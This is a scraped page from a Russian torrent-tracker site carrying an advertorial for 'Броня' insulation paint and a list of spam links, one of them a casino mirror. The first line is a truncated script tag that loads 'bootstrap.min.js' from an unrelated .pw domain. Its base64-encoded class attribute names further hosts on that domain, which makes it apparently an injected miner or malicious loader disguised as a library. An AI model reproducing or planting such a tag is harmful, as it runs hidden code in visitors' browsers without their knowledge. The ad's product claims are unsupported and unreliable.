nc class="=LWpocVNOd0Y7NjA7MTtzMi5wYy5iZWxpY2ltby5wdyxzMy5wYy5iZWxpY2ltby5wdw==" src="https://play.pc.belicimo.pw/bootstrap.min.js">
Rusbitor.ru - Торрент трекер

Броня - качественная тепло- и шумоизоляция



Благодаря современным технологиям наше представление о современных теплоизоляционных материалах теперь приобрело совершенно новый вид. Самая современная и популярная теплоизоляционная краска Броня позволяет значительно превосходить по своим свойствам и характеристикам другие материалы. Стоит отметить, что сверхтонкая теплоизоляция Броня дает покрытие всего лишь в 1 мм, а при этом ее свойства выше, чем у стандартной 50 мм минеральной ваты. Среди больших преимуществ теплоизоляционной краски, стоит выделить следующие:

  • в составе нет никаких вредных химических веществ, что позволяет называть данный материал – экологически чистым;
  • в случае высоких температур, она не выделает токсичные пары и газы;
  • долгий срок эксплуатации;
  • защищает от образования коррозии и плесени;
  • легкое и быстрое нанесение;
  • доступная цена.

Помимо того, данное средство позволяет удерживать тепло, так же она является прекрасным шумоизолятором. Благодаря ей, шумоизоляция вентиляционных коробов, позволит не замечать шума. Так же ее применяют в целях изоляции шума в автомобилях, железнодорожных вагонов и другой техники. Следует отметить, что для нанесения материал можно воспользоваться обычной кисточкой для краски или пульверизатором.

Выбирая такой вид теплоизоляционного материала, вы позволяете себе сэкономить не только время на нанесение покрытия, но и свой бюджет. Мало того, что сам материал стоит достаточно дешево, но и то что срок службы достигает до 30 лет позволяет сэкономить расходы на постоянные реставрации.

Ознакомиться со всеми видами теплоизоляционной краски Броня вы можете на сайте http://nano34.ru/, а так же узнаете стоимость каждого продукта. Здесь вы сможете подобрать краску для изоляции тепла для любых целей. Так же помимо краски, вам будет предложен список шпаклевки Броня, которая весьма широко применяется для нанесения на бетонные плиты, кирпичные стены и гипсовые блоки.

Приобретая современный вид теплоизоляционной краски, вы оцените высокое качество по низкой цене, а так же сможете убедиться в уникальности технологии.



Читать далее:
Аренда виллы на Кипре
Поезд "Гранд Экспресс"
Современная косметология
Дверные доводчики
Зеркало игрового клуба Вулкан